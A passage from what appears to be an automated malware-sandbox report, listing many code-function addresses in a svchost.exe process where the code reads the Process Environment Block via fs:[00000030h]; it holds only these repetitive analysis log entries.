                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]2_2_0396E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]2_2_03932582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]2_2_03964588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]2_2_039545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]2_2_039B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]2_2_039365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]2_2_0396A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]2_2_0396E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]2_2_0395E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]2_2_039325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]2_2_0396C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6500 mov eax, dword ptr fs:[00000030h]2_2_039C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04500 mov eax, dword ptr fs:[00000030h]2_2_03A04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940535 mov eax, dword ptr fs:[00000030h]2_2_03940535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E53E mov eax, dword ptr fs:[00000030h]2_2_0395E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938550 mov eax, dword ptr fs:[00000030h]2_2_03938550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396656A mov eax, dword ptr fs:[00000030h]2_2_0396656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA49A mov eax, dword ptr fs:[00000030h]2_2_039EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039644B0 mov ecx, dword ptr fs:[00000030h]2_2_039644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BA4B0 mov eax, dword ptr fs:[00000030h]2_2_039BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039364AB mov eax, dword ptr fs:[00000030h]2_2_039364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039304E5 mov ecx, dword ptr fs:[00000030h]2_2_039304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968402 mov eax, dword ptr fs:[00000030h]2_2_03968402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396A430 mov eax, dword ptr fs:[00000030h]2_2_0396A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392E420 mov eax, dword ptr fs:[00000030h]2_2_0392E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392C427 mov eax, dword ptr fs:[00000030h]2_2_0392C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B6420 mov eax, dword ptr fs:[00000030h]2_2_039B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039EA456 mov eax, dword ptr fs:[00000030h]2_2_039EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392645D mov eax, dword ptr fs:[00000030h]2_2_0392645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395245A mov eax, dword ptr fs:[00000030h]2_2_0395245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396E443 mov eax, dword ptr fs:[00000030h]2_2_0396E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395A470 mov eax, dword ptr fs:[00000030h]2_2_0395A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC460 mov ecx, dword ptr fs:[00000030h]2_2_039BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940BBE mov eax, dword ptr fs:[00000030h]2_2_03940BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4BB0 mov eax, dword ptr fs:[00000030h]2_2_039E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEBD0 mov eax, dword ptr fs:[00000030h]2_2_039DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03950BCB mov eax, dword ptr fs:[00000030h]2_2_03950BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930BCD mov eax, dword ptr fs:[00000030h]2_2_03930BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938BF0 mov eax, dword ptr fs:[00000030h]2_2_03938BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EBFC mov eax, dword ptr fs:[00000030h]2_2_0395EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCBF0 mov eax, dword ptr fs:[00000030h]2_2_039BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AEB1D mov eax, dword ptr fs:[00000030h]2_2_039AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04B00 mov eax, dword ptr fs:[00000030h]2_2_03A04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EB20 mov eax, dword ptr fs:[00000030h]2_2_0395EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039F8B28 mov eax, dword ptr fs:[00000030h]2_2_039F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928B50 mov eax, dword ptr fs:[00000030h]2_2_03928B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEB50 mov eax, dword ptr fs:[00000030h]2_2_039DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039E4B4B mov eax, dword ptr fs:[00000030h]2_2_039E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C6B40 mov eax, dword ptr fs:[00000030h]2_2_039C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FAB40 mov eax, dword ptr fs:[00000030h]2_2_039FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D8B42 mov eax, dword ptr fs:[00000030h]2_2_039D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0392CB7E mov eax, dword ptr fs:[00000030h]2_2_0392CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A02B57 mov eax, dword ptr fs:[00000030h]2_2_03A02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03968A90 mov edx, dword ptr fs:[00000030h]2_2_03968A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393EA80 mov eax, dword ptr fs:[00000030h]2_2_0393EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04A80 mov eax, dword ptr fs:[00000030h]2_2_03A04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03938AA0 mov eax, dword ptr fs:[00000030h]2_2_03938AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986AA4 mov eax, dword ptr fs:[00000030h]2_2_03986AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930AD0 mov eax, dword ptr fs:[00000030h]2_2_03930AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03964AD0 mov eax, dword ptr fs:[00000030h]2_2_03964AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03986ACC mov eax, dword ptr fs:[00000030h]2_2_03986ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396AAEE mov eax, dword ptr fs:[00000030h]2_2_0396AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BCA11 mov eax, dword ptr fs:[00000030h]2_2_039BCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03954A35 mov eax, dword ptr fs:[00000030h]2_2_03954A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA38 mov eax, dword ptr fs:[00000030h]2_2_0396CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA24 mov eax, dword ptr fs:[00000030h]2_2_0396CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395EA2E mov eax, dword ptr fs:[00000030h]2_2_0395EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03936A50 mov eax, dword ptr fs:[00000030h]2_2_03936A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03940A5B mov eax, dword ptr fs:[00000030h]2_2_03940A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039ACA72 mov eax, dword ptr fs:[00000030h]2_2_039ACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396CA6F mov eax, dword ptr fs:[00000030h]2_2_0396CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039DEA60 mov eax, dword ptr fs:[00000030h]2_2_039DEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov esi, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B89B3 mov eax, dword ptr fs:[00000030h]2_2_039B89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039429A0 mov eax, dword ptr fs:[00000030h]2_2_039429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039309AD mov eax, dword ptr fs:[00000030h]2_2_039309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0393A9D0 mov eax, dword ptr fs:[00000030h]2_2_0393A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039649D0 mov eax, dword ptr fs:[00000030h]2_2_039649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA9D3 mov eax, dword ptr fs:[00000030h]2_2_039FA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C69C0 mov eax, dword ptr fs:[00000030h]2_2_039C69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039629F9 mov eax, dword ptr fs:[00000030h]2_2_039629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BE9E0 mov eax, dword ptr fs:[00000030h]2_2_039BE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC912 mov eax, dword ptr fs:[00000030h]2_2_039BC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03928918 mov eax, dword ptr fs:[00000030h]2_2_03928918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039AE908 mov eax, dword ptr fs:[00000030h]2_2_039AE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B892A mov eax, dword ptr fs:[00000030h]2_2_039B892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039C892B mov eax, dword ptr fs:[00000030h]2_2_039C892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039B0946 mov eax, dword ptr fs:[00000030h]2_2_039B0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A04940 mov eax, dword ptr fs:[00000030h]2_2_03A04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039D4978 mov eax, dword ptr fs:[00000030h]2_2_039D4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC97C mov eax, dword ptr fs:[00000030h]2_2_039BC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03956962 mov eax, dword ptr fs:[00000030h]2_2_03956962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov edx, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0397096E mov eax, dword ptr fs:[00000030h]2_2_0397096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC89D mov eax, dword ptr fs:[00000030h]2_2_039BC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03930887 mov eax, dword ptr fs:[00000030h]2_2_03930887
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0395E8C0 mov eax, dword ptr fs:[00000030h]2_2_0395E8C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A008C0 mov eax, dword ptr fs:[00000030h]2_2_03A008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
